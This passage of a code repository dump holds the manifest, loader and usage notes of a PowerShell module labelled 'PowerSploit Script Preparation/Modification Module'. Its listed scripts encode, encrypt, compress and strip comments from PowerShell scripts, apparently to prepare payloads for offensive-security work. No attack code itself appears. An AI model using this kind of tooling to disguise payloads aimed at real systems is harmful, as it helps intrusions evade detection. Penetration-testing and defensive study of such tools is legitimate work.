19 | Copyright = 'BSD 3-Clause'
20 | 
21 | # Description of the functionality provided by this module
22 | Description = 'PowerSploit Script Preparation/Modification Module'
23 | 
24 | # Minimum version of the Windows PowerShell engine required by this module
25 | PowerShellVersion = '2.0'
26 | 
27 | # Name of the Windows PowerShell host required by this module
28 | # PowerShellHostName = ''
29 | 
30 | # Minimum version of the Windows PowerShell host required by this module
31 | # PowerShellHostVersion = ''
32 | 
33 | # Minimum version of the .NET Framework required by this module
34 | # DotNetFrameworkVersion = ''
35 | 
36 | # Minimum version of the common language runtime (CLR) required by this module
37 | # CLRVersion = ''
38 | 
39 | # Processor architecture (None, X86, Amd64) required by this module
40 | # ProcessorArchitecture = ''
41 | 
42 | # Modules that must be imported into the global environment prior to importing this module
43 | # RequiredModules = @()
44 | 
45 | # Assemblies that must be loaded prior to importing this module
46 | # RequiredAssemblies = @()
47 | 
48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module.
49 | # ScriptsToProcess = ''
50 | 
51 | # Type files (.ps1xml) to be loaded when importing this module
52 | # TypesToProcess = @()
53 | 
54 | # Format files (.ps1xml) to be loaded when importing this module
55 | # FormatsToProcess = @()
56 | 
57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
58 | # NestedModules = @()
59 | 
60 | # Functions to export from this module
61 | FunctionsToExport = '*'
62 | 
63 | # Cmdlets to export from this module
64 | CmdletsToExport = '*'
65 | 
66 | # Variables to export from this module
67 | VariablesToExport = ''
68 | 
69 | # Aliases to export from this module
70 | AliasesToExport = ''
71 | 
72 | # List of all modules packaged with this module.
73 | ModuleList = @(@{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'})
74 | 
75 | # List of all files packaged with this module
76 | FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1', 
77 |                'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.md'
78 | 
79 | # Private data to pass to the module specified in RootModule/ModuleToProcess
80 | # PrivateData = ''
81 | 
82 | # HelpInfo URI of this module
83 | # HelpInfoURI = ''
84 | 
85 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
86 | # DefaultCommandPrefix = ''
87 | 
88 | }
89 | 


--------------------------------------------------------------------------------
/ScriptModification/ScriptModification.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 | 


--------------------------------------------------------------------------------
/ScriptModification/Usage.md:
--------------------------------------------------------------------------------
 1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
 2 | 
 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
 5 | 
 6 | To use the module, type `Import-Module ScriptModification`
 7 | 
 8 | To see the commands imported, type `Get-Command -Module ScriptModification`
 9 | 
10 | For help on each individual command, Get-Help is your friend.
11 | 
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.


--------------------------------------------------------------------------------